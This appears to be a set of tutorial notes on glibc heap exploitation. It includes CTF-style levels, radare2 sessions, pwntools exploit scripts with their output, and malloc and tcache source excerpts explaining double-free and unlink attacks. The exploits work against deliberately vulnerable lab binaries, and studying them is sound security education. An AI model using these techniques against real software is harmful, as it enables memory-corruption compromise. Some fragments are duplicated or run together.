#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <unistd.h>
struct heapStructure {
int priority;
char *name;
};
int main(int argc, char **argv) {
struct heapStructure *i1, *i2;
i1 = malloc(sizeof(struct heapStructure));
i1->priority = 1;
i1->name = malloc(8);
i2 = malloc(sizeof(struct heapStructure));
i2->priority = 2;
i2->name = malloc(8);
strcpy(i1->name, argv[1]);
strcpy(i2->name, argv[2]);
printf("and that's a wrap folks!\n");
}
void winner() {
printf(
"Congratulations, you've completed this level @ %ld seconds past the "
"Epoch\n",
time(NULL));
}

$ r2 -d -A heap1 AAAA BBBB

$ r2 -d -A heap1
$ s main; pdf
[...]
0x004006e6 e8f5fdffff call sym.imp.strcpy ; char *strcpy(char *dest, const char *src)
0x004006eb bfa8074000 mov edi, str.and_that_s_a_wrap_folks ; 0x4007a8 ; "and that's a wrap folks!"
0x004006f0 e8fbfdffff call sym.imp.puts

$ ragg2 -P 200 -r
AABAA...

$ r2 -d -A heap1 AAABAA...
[0x004006cd]> wopO 0x41415041414f4141
40

from pwn import *
elf = context.binary = ELF('./heap1', checksec=False)
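# 40 bytes of padding (the offset wopO found above) overflow i1->name's chunk and
# overwrite the i2->name pointer with the GOT entry of puts; stripping the null
# bytes keeps the argument argv-safe. The second strcpy() then writes winner()'s
# address into that GOT entry, so the final puts() call runs winner() instead.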
param1 = (b'A' * 40 + p64(elf.got['puts'])).replace(b'\x00', b'')
param2 = p64(elf.sym['winner']).replace(b'\x00', b'')
p = elf.process(argv=[param1, param2])
print(p.clean().decode('latin-1'))

char fakemetadata[0x10] = "\x30\0\0\0\0\0\0\0"; // so we can ignore the "wrong size" error
char admin[0x10] = "Nuh-huh\0";
// List of users to keep track of
char *users[15];
int userCount = 0;

void main_loop() {
while(1) {
printf(">> ");
char input[2];
read(0, input, sizeof(input));
int choice = atoi(input);
switch (choice)
{
case 1:
createUser();
break;
case 2:
deleteUser();
break;
case 3:
complete_level();
default:
break;
}
}
}

void createUser() {
char *name = malloc(0x20);
users[userCount] = name;
printf("%s", "Name: ");
read(0, name, 0x20);
printf("User Index: %d\nName: %s\nLocation: %p\n", userCount, users[userCount], users[userCount]);
userCount++;
}

void deleteUser() {
printf("Index: ");
char input[2];
read(0, input, sizeof(input));
int choice = atoi(input);
char *name = users[choice];
printf("User %d:\n\tName: %s\n", choice, name, name);
// Check user actually exists before freeing
if(choice < 0 || choice >= userCount) {
puts("Invalid Index!");
return;
}
else {
free(name);
puts("User freed!");
}
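/* Note: the freed pointer is left in users[] and nothing marks it as freed,
so the same index can be freed again later - the double-free that the
exploit below abuses. */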
}

void complete_level() {
if(strcmp(admin, "admin\n")) {
puts("Level Complete!");
return;
}
}

from pwn import *
elf = context.binary = ELF('./vuln', checksec=False)
p = process()
def create(name='a'):
p.sendlineafter('>> ', '1')
p.sendlineafter('Name: ', name)
def delete(idx):
p.sendlineafter('>> ', '2')
p.sendlineafter('Index: ', str(idx))
def complete():
p.sendlineafter('>> ', '3')
print(p.recvline())

create('yes')
create('yes')
delete(0)
delete(1)
delete(0)

r2 -d $(pidof vuln)

create(p64(0x08080808))
pause()

p.recvuntil('data: ')
fake_metadata = int(p.recvline(), 16) - 8
log.success('Fake Metadata: ' + hex(fake_metadata))
[...]
create('junk1')
create('junk2')
pause()

create(p64(fake_metadata))

create('\x00' * 8 + 'admin\x00')
complete()

$ python3 exploit.py
[+] Starting local process 'vuln': pid 8296
[+] Fake Metadata: 0x602088
b'Level Complete!\n'

from pwn import *
elf = context.binary = ELF('./vuln', checksec=False)
p = process()
def create(name='a'):
p.sendlineafter('>> ', '1')
p.sendlineafter('Name: ', name)
def delete(idx):
p.sendlineafter('>> ', '2')
p.sendlineafter('Index: ', str(idx))
def complete():
p.sendlineafter('>> ', '3')
print(p.recvline())
p.recvuntil('data: ')
fake_metadata = int(p.recvline(), 16) - 8
log.success('Fake Metadata: ' + hex(fake_metadata))
create('yes')
create('yes')
delete(0)
delete(1)
delete(0)
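# The free list now holds chunk 0 twice, so the next allocation returns chunk 0
# while it is still queued; writing p64(fake_metadata) into it poisons the freed
# chunk's fd pointer. Once the two junk allocations drain the list, the final
# create() is serviced from our fake chunk, which overlaps the admin buffer.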
create(p64(fake_metadata))
create('junk1')
create('junk2')
create('\x00' * 8 + 'admin\x00')
complete()

if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))

remainder_size = size - nb;
remainder = chunk_at_offset (victim, nb);
av->top = remainder;

/* Treat space at ptr + offset as a chunk */
#define chunk_at_offset(p, s) ((mchunkptr) (((char *) (p)) + (s)))

if (__glibc_unlikely (size > av->system_mem))
malloc_printerr ("malloc(): corrupted top size");#include <stdio.h>
#include <stdlib.h>
int main() {
char *a = malloc(20);
char *b = malloc(20);
char *c = malloc(20);
printf("a: %p\nb: %p\nc: %p\n", a, b, c);
puts("Freeing...");
free(a);
free(b);
free(c);
puts("Allocating...");
char *d = malloc(20);
char *e = malloc(20);
char *f = malloc(20);
printf("d: %p\ne: %p\nf: %p\n", d, e, f);
}

a: 0x2292010
b: 0x2292030
c: 0x2292050
Freeing...
Allocating...
d: 0x2292050
e: 0x2292030
f: 0x2292010

Note the addresses: the chunks come back in the reverse order they were freed in (d reuses c's spot, f reuses a's), because the free list is last-in, first-out.

HEAD --> a -> b
HEAD --> a -> b -> c
HEAD --> c -> a -> b
A is the NON_MAIN_ARENA flag, which is set when the chunk is not located in the main arena; we will get to arenas in a later section, but in essence every created thread is provided a different arena (up to a limit), and chunks in these arenas have the A bit set.

struct malloc_chunk {
INTERNAL_SIZE_T mchunk_prev_size; /* Size of previous chunk (if free). */
INTERNAL_SIZE_T mchunk_size; /* Size in bytes, including overhead. */
struct malloc_chunk* fd; /* double links -- used only if free. */
struct malloc_chunk* bk;
/* Only used for large blocks: pointer to next larger size. */
struct malloc_chunk* fd_nextsize; /* double links -- used only if free. */
struct malloc_chunk* bk_nextsize;
};
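A minimal sketch of peeking at these fields from a running process, assuming a 64-bit glibc where mchunk_size sits 8 bytes below the pointer malloc() returns and its three low bits are the flags (PREV_INUSE = 0x1, IS_MMAPPED = 0x2, NON_MAIN_ARENA = 0x4):

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>

int main(void) {
    char *mem = malloc(0x20);

    /* The chunk header lives just below the returned pointer:
       mchunk_size is the 8 bytes immediately before it on 64-bit. */
    size_t raw = *(size_t *)(mem - 8);

    printf("raw size field    : %#zx\n", raw);
    printf("chunk size        : %#zx\n", raw & ~(size_t)0x7);
    printf("PREV_INUSE (P)    : %zu\n", raw & 1);        /* previous chunk in use */
    printf("IS_MMAPPED (M)    : %zu\n", (raw >> 1) & 1); /* chunk came from mmap  */
    printf("NON_MAIN_ARENA (A): %zu\n", (raw >> 2) & 1); /* chunk in a thread arena */
    return 0;
}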

Still learning :)


Consolidating fastbins



/*
If this is a large request, consolidate fastbins before continuing [...]
*/
else
{
idx = largebin_index (nb);
if (atomic_load_relaxed (&av->have_fastchunks))
malloc_consolidate (av);
}

if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
{
remainder_size = size - nb;
remainder = chunk_at_offset (victim, nb);
av->top = remainder;
set_head (victim, nb | PREV_INUSE |
(av != &main_arena ? NON_MAIN_ARENA : 0));
set_head (remainder, remainder_size | PREV_INUSE);
check_malloced_chunk (av, victim, nb);
void *p = chunk2mem (victim);
alloc_perturb (p, bytes);
return p;
}

else if (atomic_load_relaxed (&av->have_fastchunks))
{
malloc_consolidate (av);
/* restore original bin index */
if (in_smallbin_range (nb))
idx = smallbin_index (nb);
else
idx = largebin_index (nb);
}

Creating more heap space
victim = av->top;
size = chunksize (victim);
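/* victim is the current top chunk; if it is big enough for the request plus a
minimal remainder, the request is carved off its start below and av->top is
moved forward to point at the leftover piece. */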
if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
{
remainder_size = size - nb;
remainder = chunk_at_offset (victim, nb);
av->top = remainder;
set_head (victim, nb | PREV_INUSE |
(av != &main_arena ? NON_MAIN_ARENA : 0));
set_head (remainder, remainder_size | PREV_INUSE);
check_malloced_chunk (av, victim, nb);
void *p = chunk2mem (victim);
alloc_perturb (p, bytes);
return p;
}

#include <err.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
struct data {
char name[64];
};
struct fp {
void (*fp)();
char __pad[64 - sizeof(unsigned long)];
};
void winner() {
printf("Congratulations, you have passed this level\n");
}
void nowinner() {
printf(
"level has not been passed - function pointer has not been "
"overwritten\n");
}
int main(int argc, char **argv) {
struct data *d;
struct fp *f;
if (argc < 2) {
printf("Please specify an argument to copy :-)\n");
exit(1);
}
d = malloc(sizeof(struct data));
f = malloc(sizeof(struct fp));
f->fp = nowinner;
strcpy(d->name, argv[1]);
printf("data is at %p, fp is at %p, will be calling %p\n", d, f, f->fp);
fflush(stdout);
f->fp();
return 0;
}

1st bin: 512 - 568 bytes
2nd bin: 576 - 632 bytes
[...]

$ r2 -d -A heap0 AAAAAAAAAAAA <== that's just a parameter
$ s main; pdf
[...]
0x0040075d e8fefdffff call sym.imp.strcpy ; char *strcpy(char *dest, const char *src)
0x00400762 488b45f8 mov rax, qword [var_8h]
[...]

[0x004006f8]> db 0x00400762
[0x004006f8]> dc
hit breakpoint at: 0x400762

$ ragg2 -P 200 -r

$ r2 -d -A heap0 AAABAACAADAAE...

[0x004006f8]> db 0x0040075d
[0x004006f8]> db 0x00400762
[0x004006f8]> dc
hit breakpoint at: 0x40075d

[0x0040075d]> dc
hit breakpoint at: 0x400762

[0x00400762]> wopO 0x6441416341416241
80

from pwn import *
elf = context.binary = ELF('./heap0')
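# 80 bytes of padding (the offset wopO found above) run off the end of d->name and
# land on f->fp; replacing it with winner()'s address means the f->fp() call at the
# end of main() runs winner() instead of nowinner().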
payload = (b'A' * 80 + flat(elf.sym['winner'])).replace(b'\x00', b'')
p = elf.process(argv=[payload])
print(p.clean().decode('latin-1'))

FD = P->fd; /* forward chunk */
BK = P->bk; /* backward chunk */
FD->bk = BK; /* update forward chunk's bk pointer */
BK->fd = FD; /* update backward chunk's fd pointer */
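To see what that buys an attacker who controls a freed chunk's fd and bk, here is a small stand-alone simulation (not glibc itself, just the same two stores replayed on a fake struct): unlink() boils down to "write bk into fd->bk" and "write fd into bk->fd", a constrained write-what-where, with the catch that both locations have to be writable.

#include <stdio.h>
#include <stdlib.h>

/* A fake chunk layout, just for illustration. */
struct chunk {
    size_t prev_size;
    size_t size;
    struct chunk *fd;
    struct chunk *bk;
};

int main(void) {
    struct chunk where = {0};   /* pretend this is somewhere we want to write to     */
    struct chunk what  = {0};   /* pretend this is the value we want to write        */
    struct chunk P     = {0};   /* the chunk being unlinked, with attacker-set fd/bk */

    P.fd = &where;
    P.bk = &what;

    /* The two stores unlink() performs: */
    P.fd->bk = P.bk;   /* FD->bk = BK: writes &what into where.bk  */
    P.bk->fd = P.fd;   /* BK->fd = FD: writes &where into what.fd  */

    printf("where.bk = %p (should be &what  = %p)\n", (void *)where.bk, (void *)&what);
    printf("what.fd  = %p (should be &where = %p)\n", (void *)what.fd, (void *)&where);
    return 0;
}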

#include <stdio.h>
#include <stdlib.h>
int main() {
int *a = malloc(0x50);
int *b = malloc(0x50);
free(a);
free(b);
free(a);
return 1;
}

unlink()

FD = P->fd (= 0x56555780)
BK = P->bk (= 0x10000000)
FD->bk = BK (0x56555780 + 0xc = 0x10000000)
BK->fd = FD (0x10000000 + 0x8 = 0x56555780)FD->bk = BK (0x56555780 + 0xc = 0x10000000)FD = P->fd;
BK = P->bk;
if (__builtin_expect (FD->bk != P || BK->fd != P, 0))
malloc_printerr (check_action, "corrupted double-linked list", P, AV);
else {
FD->bk = BK;
BK->fd = FD;
}

char *a = malloc(0x20);
free(a);
free(a);

char *b = malloc(0x20);

strcpy(b, "\x78\x56\x34\x12");

malloc(0x20); /* This is yet another 'a', we can ignore this */
char *controlled = malloc(0x20); /* This is in the location we want */
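Putting those steps into one self-contained program, here is a sketch. It assumes a glibc with tcache but without the key-based double-free check covered later (roughly 2.26 to 2.28); on newer versions the second free() aborts, and on fastbin-only versions you need the free(a); free(b); free(a); ordering from earlier. The target global is purely illustrative.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

char target[0x20];   /* the "location we want" malloc to hand back */

int main(void) {
    char *a = malloc(0x20);
    free(a);
    free(a);                         /* double free: the bin is now a -> a         */

    char *b = malloc(0x20);          /* b == a, and a is still queued in the bin   */
    *(void **)b = (void *)target;    /* overwrite the freed chunk's next pointer   */

    malloc(0x20);                    /* this is 'a' yet again, we can ignore it    */
    char *controlled = malloc(0x20); /* and this one comes straight out of target  */

    printf("target     = %p\ncontrolled = %p\n", (void *)target, (void *)controlled);
    strcpy(controlled, "arbitrary write");
    printf("target now holds: \"%s\"\n", target);
    return 0;
}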






New and efficient heap management
Reintroducing double-frees


#define PROTECT_PTR(pos, ptr) \
((__typeof (ptr)) ((((size_t) pos) >> 12) ^ ((size_t) ptr)))
#define REVEAL_PTR(ptr) PROTECT_PTR (&ptr, ptr)

if (__glibc_unlikely (misaligned_chunk (p)))
malloc_printerr ("malloc_consolidate(): "
"unaligned fastbin chunk detected");if (__glibc_unlikely (misaligned_chunk (p)))
malloc_printerr ("<funcname>(): "
"unaligned fastbin chunk detected")if (__glibc_unlikely (!aligned_OK (e)))
malloc_printerr ("tcache_thread_shutdown(): "
"unaligned tcache chunk detected");if (__glibc_unlikely (!aligned_OK (e)))
malloc_printerr ("malloc(): unaligned tcache chunk detected");if (__glibc_unlikely (pp != NULL && misaligned_chunk (pp))) \
malloc_printerr ("malloc(): unaligned fastbin chunk detected");if (__glibc_unlikely (misaligned_chunk (victim)))
malloc_printerr ("malloc(): unaligned fastbin chunk detected 2");if (__glibc_unlikely (misaligned_chunk (tc_victim)))
malloc_printerr ("malloc(): unaligned fastbin chunk detected 3");#define aligned_OK(m) (((unsigned long)(m) & MALLOC_ALIGN_MASK) == 0)
#define misaligned_chunk(p) \
((uintptr_t)(MALLOC_ALIGNMENT == 2 * SIZE_SZ ? (p) : chunk2mem (p)) \
& MALLOC_ALIGN_MASK)

#define MALLOC_ALIGN_MASK (MALLOC_ALIGNMENT - 1)

if (__glibc_unlikely (e->key == tcache))
{
tcache_entry *tmp;
LIBC_PROBE (memory_tcache_double_free, 2, e, tc_idx);
for (tmp = tcache->entries[tc_idx]; tmp; tmp = REVEAL_PTR (tmp->next))
{
if (__glibc_unlikely (!aligned_OK (tmp)))
malloc_printerr ("free(): unaligned chunk detected in tcache 2");
if (tmp == e)
malloc_printerr ("free(): double free detected in tcache 2");
/* If we get here, it was a coincidence. We've wasted a
few cycles, but don't abort. */
}
}

The first heap exploits
A primitive double-free protection
typedef struct tcache_entry
{
struct tcache_entry *next;
/* This field exists to detect double frees. */
struct tcache_perthread_struct *key;
} tcache_entry;

/* Caller must ensure that we know tc_idx is valid and there's room
for more chunks. */
static __always_inline void tcache_put (mchunkptr chunk, size_t tc_idx)
{
tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
assert (tc_idx < TCACHE_MAX_BINS);
/* Mark this chunk as "in the tcache" so the test in _int_free will
detect a double free. */
e->key = tcache;
e->next = tcache->entries[tc_idx];
tcache->entries[tc_idx] = e;
++(tcache->counts[tc_idx]);
}

#if USE_TCACHE
{
size_t tc_idx = csize2tidx (size);
if (tcache != NULL && tc_idx < mp_.tcache_bins)
{
/* Check to see if it's already in the tcache. */
tcache_entry *e = (tcache_entry *) chunk2mem (p);
/* This test succeeds on double free. However, we don't 100%
trust it (it also matches random payload data at a 1 in
2^<size_t> chance), so verify it's not an unlikely
coincidence before aborting. */
if (__glibc_unlikely (e->key == tcache))
{
tcache_entry *tmp;
LIBC_PROBE (memory_tcache_double_free, 2, e, tc_idx);
for (tmp = tcache->entries[tc_idx];
tmp;
tmp = tmp->next)
if (tmp == e)
malloc_printerr ("free(): double free detected in tcache 2");
/* If we get here, it was a coincidence. We've wasted a
few cycles, but don't abort. */
}
if (tcache->counts[tc_idx] < mp_.tcache_count)
{
tcache_put (p, tc_idx);
return;
}
}
}
#endif

if (__glibc_unlikely (e->key == tcache))

tcache_entry *tmp;
LIBC_PROBE (memory_tcache_double_free, 2, e, tc_idx);
for (tmp = tcache->entries[tc_idx]; tmp; tmp = tmp->next)
if (tmp == e)
malloc_printerr ("free(): double free detected in tcache 2");
/* If we get here, it was a coincidence. We've wasted a
few cycles, but don't abort. */

static __always_inline void tcache_put (mchunkptr chunk, size_t tc_idx)
{
tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
/* Mark this chunk as "in the tcache" so the test in _int_free will
detect a double free. */
e->key = tcache_key;
e->next = PROTECT_PTR (&e->next, tcache->entries[tc_idx]);
tcache->entries[tc_idx] = e;
++(tcache->counts[tc_idx]);
}

static void tcache_key_initialize (void)
{
if (__getrandom (&tcache_key, sizeof(tcache_key), GRND_NONBLOCK)
!= sizeof (tcache_key))
{
tcache_key = random_bits ();
#if __WORDSIZE == 64
tcache_key = (tcache_key << 32) | random_bits ();
#endif
}
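To get a feel for what PROTECT_PTR does to the next pointers, here is a small stand-alone re-implementation (the macro is copied from above; the addresses are made up). Mangling is just an XOR with the page number of the location the pointer is stored at, so XOR-ing twice with the same position recovers the value. That also means anyone who can leak or guess the heap's page address can forge valid mangled pointers, and the head of an empty bin is NULL mangled, i.e. just that page number, which is why a use-after-free read of it leaks heap address bits.

#include <stdio.h>
#include <stdint.h>

/* Same macro as in glibc above. */
#define PROTECT_PTR(pos, ptr) \
  ((__typeof (ptr)) ((((size_t) pos) >> 12) ^ ((size_t) ptr)))

int main(void) {
    /* Made-up addresses, purely for illustration. */
    size_t storage = 0x55555555a010;   /* where the next pointer lives (&e->next) */
    size_t next    = 0x55555555a2a0;   /* the value being stored                  */

    size_t mangled  = (size_t) PROTECT_PTR (storage, next);
    size_t revealed = (size_t) PROTECT_PTR (storage, mangled);  /* XOR twice      */

    printf("next     = %#zx\n", next);
    printf("mangled  = %#zx\n", mangled);
    printf("revealed = %#zx\n", revealed);

    /* An empty bin's head is NULL, so its mangled form is just storage >> 12. */
    printf("mangled NULL = %#zx (== storage >> 12 = %#zx)\n",
           (size_t) PROTECT_PTR (storage, (size_t) 0), storage >> 12);
    return 0;
}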
}